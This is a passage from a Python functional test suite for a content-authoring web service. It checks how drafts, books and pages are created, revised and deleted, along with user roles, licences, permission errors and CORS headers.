u'authors': [rasmus_role],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [rasmus_role],
u'id': result['id'],
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'title': u'Turning DNA through resonance',
u'abstract': u'Theories on turning DNA structures',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [u'Science and Technology'],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [u'DNA', u'resonance'],
u'state': u'Draft',
u'publication': None,
u'cnx-archive-uri': post_data['id'],
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [rasmus_role],
u'copyrightHolders': [rasmus_role],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
# Check that resources are saved
resource_path = re.search('(/resources/[^"]*)"', content).group(1)
response = self.testapp.get(resource_path, status=200)
self.assertEqual(response.content_type, 'image/jpeg')
self.assert_cors_headers(response)
def test_post_content_revision_w_multiroles(self):
self.logout()
self.login('OpenStaxCollege')
post_data = {
'id': u'e79ffde3-7fb4-4af3-9ec8-df648b391597@7.1',
}
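        # Revising a collection with several role holders should also carry
        # over a licensor acceptance record for each of them (verified
        # against storage below).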
now = datetime.datetime.now(TZINFO)
formatted_now = unicode(now.astimezone(TZINFO).isoformat())
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
# Test the object for internal data correctness
from ..storage import storage
document = storage.get(id=result['id'])
self.assertEqual(
sorted(document.licensor_acceptance, key=lambda v: v['id']),
[{'has_accepted': True, 'id': 'OSCRiceUniversity'},
{'has_accepted': True, 'id': 'OpenStaxCollege'},
{'has_accepted': True, 'id': 'cnxcap'}])
# Test the response data
license = result.pop('license')
self.assertEqual(license['url'], DEFAULT_LICENSE.url)
original_license = result.pop('originalLicense')
self.assertEqual(original_license['url'], DEFAULT_LICENSE.url)
created = result.pop('created')
self.assertTrue(created.startswith('2013-07-31'))
revised = result.pop('revised')
self.assertEqual(revised, formatted_now)
abstract = result.pop('abstract')
self.assertTrue('two-semester college physics book' in abstract)
keywords = result.pop('keywords')
self.assertIn('drag', keywords)
# Test the tree for contents.
tree = result.pop('tree')
flattener = cnxepub.flatten_tree_to_ident_hashes(tree)
        contained_ids = list(flattener)
self.assertIn(u'e79ffde3-7fb4-4af3-9ec8-df648b391597@draft',
contained_ids)
self.assertIn(u'56f1c5c1-4014-450d-a477-2121e276beca@8',
contained_ids)
# FIXME the user info we have in archive differs from
# that here in authoring.
osc_user_info = {
u'firstname': u'Test',
u'fullname': u'Test User',
u'id': u'OpenStaxCollege',
u'surname': u'User',
u'type': u'cnx-id',
}
osc_role = osc_user_info.copy()
osc_role.update({
u'assignmentDate': formatted_now,
u'hasAccepted': True,
u'firstname': u'OpenStax College',
u'fullname': u'OpenStax College',
u'requester': u'OpenStaxCollege',
u'surname': None,
})
cnxcap_role = {
u'assignmentDate': formatted_now,
u'firstname': u'College',
u'fullname': u'OSC Physics Maintainer',
u'hasAccepted': True,
u'id': u'cnxcap',
u'requester': u'OpenStaxCollege',
u'surname': u'Physics',
u'type': u'cnx-id',
}
rice_role = {
u'assignmentDate': formatted_now,
u'firstname': u'Rice',
u'fullname': u'Rice University',
u'hasAccepted': True,
u'id': u'OSCRiceUniversity',
u'requester': u'OpenStaxCollege',
u'surname': u'University',
u'type': u'cnx-id',
}
expected = {
u'areContainedPublishable': False,
u'authors': [osc_role],
u'cnx-archive-uri': post_data['id'],
u'containedIn': [],
u'content': u'',
u'copyrightHolders': [rice_role],
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'editors': [],
u'id': post_data['id'].split('@')[0],
u'illustrators': [],
u'isPublishable': True,
u'publishBlockers': None,
u'language': u'en',
u'licensors': [rice_role],
u'mediaType': u'application/vnd.org.cnx.collection',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'publishers': [osc_role, cnxcap_role],
u'state': u'Draft',
u'subjects': [
u'Mathematics and Statistics',
u'Science and Technology',
u'OpenStax Featured'],
u'submitter': osc_user_info,
u'title': u'College Physics',
u'translators': [],
u'version': u'draft',
u'printStyle': None,
}
self.assertEqual(result, expected)
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(result['id']), status=200)
result = response.json
license = result.pop('license')
self.assertEqual(license['url'], DEFAULT_LICENSE.url)
original_license = result.pop('originalLicense')
self.assertEqual(original_license['url'], DEFAULT_LICENSE.url)
created = result.pop('created')
self.assertTrue(created.startswith('2013-07-31'))
revised = result.pop('revised')
self.assertEqual(revised, formatted_now)
abstract = result.pop('abstract')
self.assertTrue('two-semester college physics book' in abstract)
keywords = result.pop('keywords')
self.assertIn('drag', keywords)
# Test the tree for contents.
tree = result.pop('tree')
flattener = cnxepub.flatten_tree_to_ident_hashes(tree)
        contained_ids = list(flattener)
self.assertIn(u'e79ffde3-7fb4-4af3-9ec8-df648b391597@draft',
contained_ids)
self.assertIn(u'56f1c5c1-4014-450d-a477-2121e276beca@8',
contained_ids)
self.assertEqual(result, expected)
self.assert_cors_headers(response)
def test_post_content(self):
post_data = {
'title': u"Turning DNA through resonance",
'abstract': u"Theories on turning DNA structures",
'created': u'2014-03-13T15:21:15.677617',
'revised': u'2014-03-13T15:21:15.677617',
'license': {'url': DEFAULT_LICENSE.url},
'language': u'en',
'content': u"Ding dong the switch is flipped.",
'subjects': [u'Science and Technology'],
'keywords': [u'DNA', u'resonance'],
'editors': [SUBMITTER],
}
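        # On creation the client may supply 'created'/'revised' and a
        # license; the values posted here are expected to be echoed back in
        # the result below.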
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
license = result.pop('license')
self.assertEqual(license['url'], post_data['license']['url'])
original_license = result.pop('originalLicense')
self.assertEqual(original_license['url'], post_data['license']['url'])
created = result.pop('created')
self.assertTrue(created.startswith('2014-03-13T15:21:15.677617'))
revised = result.pop('revised')
self.assertTrue(revised.startswith('2014-03-13T15:21:15.677617'))
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'title': post_data['title'],
u'abstract': post_data['abstract'],
u'language': post_data['language'],
u'containedIn': [],
u'content': post_data['content'],
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'subjects': post_data['subjects'],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': post_data['keywords'],
u'state': u'Draft',
u'publication': None,
u'editors': [submitter_w_assign_date],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
def test_post_content_binder(self):
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents',
{'title': 'Page one'}, status=201)
page1 = response.json
self.assert_cors_headers(response)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents',
{'title': 'Page two'}, status=201)
page2 = response.json
self.assert_cors_headers(response)
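        # Build a binder whose tree nests page two inside an inline
        # subcollection ('subcol'); the empty pages are expected to show up
        # as unpublishable ('no_content') in the returned tree.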
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json('/users/contents', {
'title': 'Book',
'abstract': 'Book abstract',
'language': 'de',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page1['id']),
'title': 'Page one',
},
{
'id': 'subcol',
'title': 'New section',
'contents': [
{
'id': '{}@draft'.format(page2['id']),
'title': 'Page two',
},
],
},
],
},
}, status=201)
book = response.json
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(book['id']), status=200)
result = response.json
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(result, {
u'id': book['id'],
u'title': u'Book',
u'abstract': u'Book abstract',
u'areContainedPublishable': False,
u'containedIn': [],
u'content': u'',
u'mediaType': u'application/vnd.org.cnx.collection',
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'language': u'de',
u'version': u'draft',
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'tree': {
u'id': u'{}@draft'.format(book['id']),
u'title': u'Book',
u'isPublishable': True,
u'publishBlockers': None,
u'contents': [
{
u'id': u'{}@draft'.format(page1['id']),
u'title': u'Page one',
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
},
{
u'id': u'subcol',
u'title': u'New section',
u'contents': [
{
u'id': u'{}@draft'.format(page2['id']),
u'title': u'Page two',
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
},
],
},
],
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
def test_put_content_401(self):
self.logout()
response = self.testapp.put_json(
'/contents/1234abcde@draft.json', {}, status=401)
self.assert_cors_headers(response)
def test_put_content_not_found(self):
response = self.testapp.put_json(
'/contents/1234abcde@draft.json',
{'title': u'Update document title'}, status=404)
self.assert_cors_headers(response)
def test_put_content_403(self):
response = self.testapp.post_json('/users/contents', {
'title': u'My document タイトル',
'abstract': u'My document abstract',
'language': u'en'}, status=201)
document = response.json
with mock.patch('cnxauthoring.models.Document.__acl__') as acl:
acl.return_value = ()
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(document['id']),
{'title': 'new title'}, status=403)
self.assertTrue('You do not have permission to edit'
in response.body.decode('utf-8'))
response = self.testapp.post_json('/users/contents', {
'title': u'My binder タイトル',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
'language': u'en'}, status=201)
binder = response.json
with mock.patch('cnxauthoring.models.Binder.__acl__') as acl:
acl.return_value = ()
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(binder['id']),
{'title': 'new title'}, status=403)
self.assertTrue('You do not have permission to edit'
in response.body.decode('utf-8'))
def test_put_content_invalid_json(self):
response = self.testapp.post_json('/users/contents', {
'title': u'My document タイトル',
'abstract': u'My document abstract',
'language': u'en'}, status=201)
document = response.json
self.assert_cors_headers(response)
response = self.testapp.put(
'/contents/{}@draft.json'.format(document['id']),
'invalid json', content_type='application/json', status=400)
self.assertTrue('Invalid JSON' in response.body.decode('utf-8'))
self.assert_cors_headers(response)
def test_put_content_derived_from(self):
post_data = {
'derivedFrom': u'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
self.assert_cors_headers(response)
post_data = {
'content': '<html><body><p>Page content</p></body></html>',
}
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
post_data, status=200)
result = response.json
self.assertEqual(result['content'], post_data['content'])
self.assertEqual(result['revised'], now.astimezone(TZINFO).isoformat())
self.assert_cors_headers(response)
def test_put_content_binder_document_not_found(self):
response = self.testapp.post_json('/users/contents', {
'title': u'My book タイトル',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}, status=201)
self.assert_cors_headers(response)
binder = response.json
update_data = {
'title': u'...',
'tree': {
'contents': [{
u'id': u'7d089006-5a95-4e24-8e04-8168b5c41aa3@draft',
u'title': u'Hygiene',
}],
},
}
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(binder['id']),
update_data, status=400)
self.assertTrue(
'Document Not Found: 7d089006-5a95-4e24-8e04-8168b5c41aa3@draft'
in response.body.decode('utf-8'))
def test_put_content_binder(self):
# Create a derived binder
post_data = {
'derivedFrom': u'a733d0d2-de9b-43f9-8aa9-f0895036899e@1.1',
}
created = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = created
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
binder = response.json
self.assert_cors_headers(response)
update_data = {
'title': u'...',
'abstract': u'...',
'tree': {
'contents': [{
u'id': u'7d089006-5a95-4e24-8e04-8168b5c41aa3@1',
u'title': u'Hygiene',
}],
},
}
revised = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = revised
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(binder['id']),
update_data, status=200)
binder = response.json
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date[u'assignmentDate'] = unicode(
created.astimezone(TZINFO).isoformat())
self.assertEqual(binder, {
u'areContainedPublishable': False,
u'created': unicode(created.astimezone(TZINFO).isoformat()),
u'revised': unicode(revised.astimezone(TZINFO).isoformat()),
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': binder['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'<span style="color:red;">Derived</span> Copy of College <i>Physics</i>',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'abstract': u'...',
u'containedIn': [],
u'content': u'',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.collection',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'title': u'...',
u'tree': {
u'id': u'{}@draft'.format(binder['id']),
u'title': u'...',
u'isPublishable': True,
u'publishBlockers': None,
u'contents': [{
u'id': u'7d089006-5a95-4e24-8e04-8168b5c41aa3@1',
u'title': u'Hygiene',
}],
},
u'subjects': [],
u'keywords': [],
u'isPublishable': True,
u'publishBlockers': None,
u'state': u'Draft',
u'publication': None,
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(binder['id']), status=200)
binder = response.json
self.assertEqual(binder, {
u'areContainedPublishable': False,
u'created': created.astimezone(TZINFO).isoformat(),
u'revised': revised.astimezone(TZINFO).isoformat(),
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': binder['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'<span style="color:red;">Derived</span> Copy of College <i>Physics</i>',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'abstract': u'...',
u'containedIn': [],
u'content': u'',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.collection',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'title': u'...',
u'tree': {
u'id': u'{}@draft'.format(binder['id']),
u'title': u'...',
u'isPublishable': True,
u'publishBlockers': None,
u'contents': [{
u'id': u'7d089006-5a95-4e24-8e04-8168b5c41aa3@1',
u'title': u'Hygiene',
}],
},
u'subjects': [],
u'keywords': [],
u'isPublishable': True,
u'publishBlockers': None,
u'state': u'Draft',
u'publication': None,
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
def test_put_content_binder2(self):
response = self.testapp.post_json('/users/contents', {
'title': 'Empty book',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}, status=201)
binder = response.json
created = binder['created']
response = self.testapp.post_json(
'/users/contents', {'title': 'Empty page'}, status=201)
page = response.json
revised = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = revised
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(binder['id']), {
'id': '{}@draft'.format(binder['id']),
'downloads': [],
'isLatest': True,
'derivedFrom': None,
'abstract': '',
'revised': '2014-05-02T12:42:09.490860-04:00',
'keywords': [],
'subjects': [],
'publication': None,
'license': {
'url': 'http://creativecommons.org/licenses/by/4.0/',
'version': '4.0',
'name': 'Creative Commons Attribution License',
'abbr': 'by'
},
'language': 'en',
'title': 'etst book',
'created': '2014-05-02T12:42:09.490738-04:00',
'tree': {
'id': '{}@draft'.format(binder['id']),
'title': 'etst book',
'contents': [
{'id': 'f309a0f9-63fb-46ca-9585-d1e1dc96a142@3',
'title':
'Introduction to Two-Dimensional Kinematics'},
{'id': 'e12329e4-8d6c-49cf-aa45-6a05b26ebcba@2',
'title':
'Introduction to One-Dimensional Kinematics'},
{'id': '{}@draft'.format(page['id']),
'title': 'test page'}
]
},
'mediaType': 'application/vnd.org.cnx.collection',
'content': '',
'state': 'Draft',
'version': 'draft',
'submitter': SUBMITTER,
'authors': [SUBMITTER_WITH_ACCEPTANCE],
'publishers': [SUBMITTER_WITH_ACCEPTANCE],
'error': False,
}, status=200)
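        # The client-supplied 'created'/'revised' values in the payload above
        # should be ignored: 'created' stays as originally stored and
        # 'revised' is stamped by the server (mocked to `revised` here).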
response = self.testapp.get(
'/contents/{}@draft.json'.format(binder['id']), status=200)
result = response.json
self.assertEqual(result['created'], created)
self.assertEqual(
result['revised'], revised.astimezone(TZINFO).isoformat())
self.assertEqual(result['tree'], {
'id': '{}@draft'.format(binder['id']),
'title': 'etst book',
'isPublishable': True,
'publishBlockers': None,
'contents': [
{
'id': 'f309a0f9-63fb-46ca-9585-d1e1dc96a142@3',
'title': 'Introduction to Two-Dimensional Kinematics'
},
{
'id': 'e12329e4-8d6c-49cf-aa45-6a05b26ebcba@2',
'title': 'Introduction to One-Dimensional Kinematics'
},
{
'id': '{}@draft'.format(page['id']),
'title': 'test page',
'isPublishable': False,
'publishBlockers': ['no_content'],
}
]
})
def test_put_content(self):
created = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = created
response = self.testapp.post_json('/users/contents', {
'title': u'My document タイトル',
'abstract': u'My document abstract',
'language': u'en'}, status=201)
document = response.json
self.assert_cors_headers(response)
update_data = {
'title': u"Turning DNA through resonance",
'abstract': u"Theories on turning DNA structures",
'content': u"Ding dong the switch is flipped.",
'keywords': ['DNA', 'resonance'],
'subjects': ['Science and Technology'],
}
revised = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = revised
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(document['id']),
update_data, status=200)
result = response.json
self.assertEqual(result['id'], document['id'])
self.assertEqual(result['title'], update_data['title'])
self.assertEqual(result['abstract'], update_data['abstract'])
self.assertEqual(result['language'], document['language'])
self.assertEqual(result['content'], update_data['content'])
self.assertEqual(result['keywords'], update_data['keywords'])
self.assertEqual(result['subjects'], update_data['subjects'])
self.assertEqual(result['created'],
created.astimezone(TZINFO).isoformat())
self.assertEqual(result['revised'],
revised.astimezone(TZINFO).isoformat())
response = self.testapp.get(
'/contents/{}@draft.json'.format(document['id']))
result = response.json
self.assertEqual(result['id'], document['id'])
self.assertEqual(result['title'], update_data['title'])
self.assertEqual(result['abstract'], update_data['abstract'])
self.assertEqual(result['language'], document['language'])
self.assertEqual(result['content'], update_data['content'])
self.assertEqual(result['keywords'], update_data['keywords'])
self.assertEqual(result['subjects'], update_data['subjects'])
self.assertEqual(result['created'],
created.astimezone(TZINFO).isoformat())
self.assertEqual(result['revised'],
revised.astimezone(TZINFO).isoformat())
self.assert_cors_headers(response)
def test_delete_content_401(self):
self.logout()
        response = self.testapp.delete('/contents/1234abcde@draft',
                                       status=401)
self.assert_cors_headers(response)
def test_delete_content_403(self):
response = self.testapp.post_json(
'/users/contents', {'title': 'My page'}, status=201)
page = response.json
self.assert_cors_headers(response)
self.logout()
self.login('you')
response = self.testapp.delete(
'/contents/{}@draft'.format(page['id']), status=403)
self.assert_cors_headers(response)
def test_delete_content(self):
response = self.testapp.post_json(
'/users/contents', {'title': 'My page'}, status=201)
page = response.json
self.assert_cors_headers(response)
# test that it's possible to get the content we just created
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# delete the content
response = self.testapp.delete(
'/contents/{}@draft'.format(page['id']), status=200)
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=404)
def test_delete_content_multiple(self):
# create two pages
response = self.testapp.post_json('/users/contents', {
'title': 'Page one',
'editors': [{'id': 'user2'}]}, status=201)
page_one = response.json
response = self.testapp.post_json('/users/contents', {
'title': 'Page two'}, status=201)
page_two = response.json
# create a book, put the two pages inside the book, plus
# one page from archive
response = self.testapp.post_json('/users/contents', {
'title': 'My book',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{'id': '{}@draft'.format(page_one['id']),
'title': 'Page one'},
{'id': '{}@draft'.format(page_two['id']),
'title': 'Page two'},
{'id': '91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
'title': 'Page three'}],
},
}, status=201)
book = response.json
# login as user2
self.logout()
self.login('user2')
# create another book, put only page one in it
response = self.testapp.post_json('/users/contents', {
'title': "User2's book",
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{'id': '{}@draft'.format(page_one['id']),
'title': 'Page one'}],
},
}, status=201)
# log back in as user1
self.logout()
self.login('user1')
# delete the book and all the pages inside it
response = self.testapp.put_json('/contents/delete', [
book['id'], page_one['id'], page_two['id'],
'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
], status=200)
# only the book and page_two should be deleted
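        # page_one is not deleted because it is still contained in user2's
        # book, and the page that lives only in archive has no draft in
        # authoring to delete.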
deleted = response.json
self.assertEqual(deleted, [book['id'], page_two['id']])
self.testapp.get('/contents/{}@draft.json'.format(book['id']),
status=404)
self.testapp.get('/contents/{}@draft.json'.format(page_one['id']),
status=200)
self.testapp.get('/contents/{}@draft.json'.format(page_two['id']),
status=404)
@mock.patch('cnxauthoring.views.logger')
def test_delete_content_w_publish_error(self, logger):
# Start test similar to test for multiple users
response = self.testapp.post_json('/users/contents', {
'title': 'Multiple users test',
'editors': [{'id': 'you'}],
}, status=201)
page = response.json
self.assert_cors_headers(response)
self.testapp.get('/contents/{}@draft.json'.format(page['id']),
status=200)
self.logout()
self.login('you')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
self.testapp.put_json(
'/contents/{}@draft/acceptance'.format(page['id']),
{'license': True,
'roles': [{'role': 'editors', 'hasAccepted': True}]},
status=200)
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'title': 'Multiple users test edited by you'}, status=200)
self.logout()
self.login('user2')
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=403)
self.logout()
self.login('user1')
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
self.assertEqual(response.json['title'],
'Multiple users test edited by you')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
self.testapp.delete('/contents/{}@draft'.format(page['id']),
status=403)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# Delete the contents of the page completely from archive's database
with psycopg2.connect(
publishing_settings()['db-connection-string']) as db_conn:
with db_conn.cursor() as cursor:
cursor.execute(
"""DELETE FROM document_acl \
WHERE uuid = %s""", (page['id'],))
cursor.execute(
"""DELETE FROM license_acceptances \
WHERE uuid = %s""", (page['id'],))
cursor.execute(
"""DELETE FROM modules \
WHERE uuid = %s""", (page['id'],))
cursor.execute(
"""DELETE FROM role_acceptances \
WHERE uuid = %s""", (page['id'],))
cursor.execute(
"""DELETE FROM document_controls \
WHERE uuid = %s""", (page['id'],))
# Send a delete request to authoring to remove the page from its
# database
self.testapp.delete(
'/contents/{}@draft/users/me'.format(page['id']), status=200)
# Check to see that authoring created a warning message when publishing
# failed to find the page.
self.assertEqual(logger.exception.call_count, 1)
args1, = logger.exception.call_args_list
self.assertEqual(
args1[0], ('Warning: '
'publishing error on '
'content id {} '.format(page['id']),))
# Make sure user can no longer access the page
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=403)
        # Finish the test by making sure the requests sent by
        # users are unaffected by the publishing warning.
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), items)
self.logout()
self.login('you')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'title': 'Multiple users test edited again by you'}, status=200)
self.logout()
self.login('user1')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), items)
post_data = {
'id': '{}@draft'.format(page['id']),
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
def test_delete_content_binder(self):
# Create a page first
response = self.testapp.post_json('/users/contents', {
'title': 'My page',
}, status=201)
page = response.json
self.assert_cors_headers(response)
# Create a book with the page inside
response = self.testapp.post_json('/users/contents', {
'title': 'My book',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page['id']),
'title': 'My page',
},
],
},
}, status=201)
book_one = response.json
self.assert_cors_headers(response)
# Create another book with the same page inside
response = self.testapp.post_json('/users/contents', {
'title': 'My different book',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page['id']),
'title': 'My page',
},
],
},
}, status=201)
book_two = response.json
self.assert_cors_headers(response)
# Assert that the page is contained in two books
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']))
result = response.json
self.assertEqual(sorted(result['containedIn']),
sorted([book_one['id'], book_two['id']]))
# Delete book one
self.testapp.delete('/contents/{}@draft'.format(book_one['id']),
status=200)
self.testapp.get('/contents/{}@draft.json'.format(book_one['id']),
status=404)
# Assert that the page is now only contained in book two
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']))
result = response.json
self.assertEqual(result['containedIn'], [book_two['id']])
def test_delete_content_multiple_users(self):
response = self.testapp.post_json('/users/contents', {
'title': 'Multiple users test',
'editors': [{'id': 'you'}],
}, status=201)
page = response.json
self.assert_cors_headers(response)
self.testapp.get('/contents/{}@draft.json'.format(page['id']),
status=200)
self.logout()
self.login('you')
# editor should get the content in their workspace
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
# make sure the editor can also view the content
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# make sure the editor can also edit the content after accepting their
# role
self.testapp.put_json(
'/contents/{}@draft/acceptance'.format(page['id']),
{'license': True,
'roles': [{'role': 'editors', 'hasAccepted': True}]},
status=200)
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'title': 'Multiple users test edited by you'}, status=200)
self.logout()
self.login('user2')
# someone not in acl should not be able to view the content
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=403)
self.logout()
# log back in as the submitter and check that the title has been
# changed
self.login('user1')
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
self.assertEqual(response.json['title'],
'Multiple users test edited by you')
